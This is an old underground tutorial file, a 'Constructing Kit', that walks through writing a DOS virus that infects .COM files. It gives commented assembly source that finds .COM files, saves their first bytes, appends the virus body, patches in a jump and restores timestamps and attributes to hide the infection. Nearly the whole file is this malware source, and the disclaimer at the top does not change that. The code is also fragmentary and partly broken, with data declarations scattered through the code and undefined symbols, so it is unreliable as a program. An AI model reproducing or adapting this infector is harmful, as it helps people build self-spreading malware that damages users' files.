****************************************** ** Constructing Kit on infecting .COM ** ** ** ** ** ****************************************** ***Disclaimer*** ---------- This file is for information purposes only, I as author of this file, do not take any responsibility for anyone why uses this information in any illegal way. By downloading or copying this file, you are agreeing to not use this information in any illegal way. This is a brief description what the ASM Source will do. 1. Find a .COM file in the current Directory 2. Save the Date and File's Attribute. 3. Save the First 3 Bytes in a Stack 4. Infect the File & restore new 3 bytes.. 5. Put the OLD date and File Attributes back on Beginning... ~~~~~~~~~~~~ ;---------------------------------------------------------------------- ; The Simple routine to Search for a .COM File... ;---------------------------------------------------------------------- com_files db "*.com",0 mov ah,4eh ;point to a *.COM file... mov dx,com_files mov cx,3 ;Attributes with ReadOnly or Hidden int 21h ;is A okay... cmp ax,12h ;Any files found? je exit ;If no Files found Exit... jmp found_file ; Instead of Exiting here you can make the Virus go and change dir and ; look for several other .com files else where... with the help of the ; path or simply searching for more ... found_file: mov di,[si+file] ;di points to the filename push si add si,file ;si points to filename... mov ax,offset 4300h ;get file Attributes... mov dx,si ;filename in dx.. int 21h mov file_attrib,cx ;Save file Attributes. file dw 0 ; Here we'll set the file attributes to nothing mov ax,offset 4301h ;To set file Attributes... mov cx,offset 0fffeh ;Set them to a Normal File mov dx,si ;filename... int 21h mov ax,offset 3d02h ;Open File to Read/Write. mov dx,si ;ASCIIZ filename int 21h jnb ok ;If file was open continue jmp put_old_attrib ; error happened restore old attribs ; and quit. ok: mov bx,ax mov ax,offset 5700h ;Get File Date & Time... int 21h mov old_time,cx ;Save old File Time... mov old_date,dx ;Save old File Date old_time db 0 old_date db 0 ; here we infect the file... but first we SAVE the first 3 bytes ; somewhere in our virus mov ah,3fh ;Read file... mov cx,3 ;Number of bytes to read mov dx,first_3 ;Save bytes in the buffer add dx,si ;Filename... int 21h cmp ax,3 ;Where 3 bytes read? jnz fix_file ;If not fix file like before and quit first_3 equ $ ; The First three bytes of the Original File! int 20h ; the virus is infected to. nop ; This moves the File pointer to the END of the file mov ax,offset 4202h mov cx,0 mov dx,0 int 21h mov cx,ax ;DX:AX is the FILESIZE! sub ax,3 ;subtract three because of file pointer add cx,offset c_len_y mov di,si sub di,offset c_len_x mov [di],cx ;Modifies the 2nd & 3rd bytes of program ; The writes our virus to the file mov ah,40h mov cx,virlength ;Virus Length mov dx,si ;File... sub dx,offset codelength ;Length of virus codes. int 21h cmp ax,offset virlength ;all bytes written? jnz fix_file ;If no fix file and quit ;Moves the file pointer to the beginning of file and write the ;3 bytes JMP at the beginning of the file mov ax,offset 4200h mov cx,0 mov dx,0 int 21h mov ah,40h ;Write to file... mov cx,3 ;# of bytes to write... mov dx,si ;File name... add dx,jump ;Point to the new JMP statement int 21h jump db 0e9h ;This is the JMP that will be put in the ;Begining of the file! ;Restore Old File Time & Date fix_file: mov dx,old_date ;Old File Date mov cx,old_time ;Old file Time... and cx,offset 0ffe0h ;Flat Attribs. mov ax,offset 5701h int 21h mov ah,3eh int 21h ;Close file... ; Here we'll restore the old file attributes... put_old_attrib: mov ax,offset 4301h mov cx,old_att ;old File Attributes. mov dx,si ;Filename... int 21h ;----------------------------- EnD ------------------------------------- -anonymous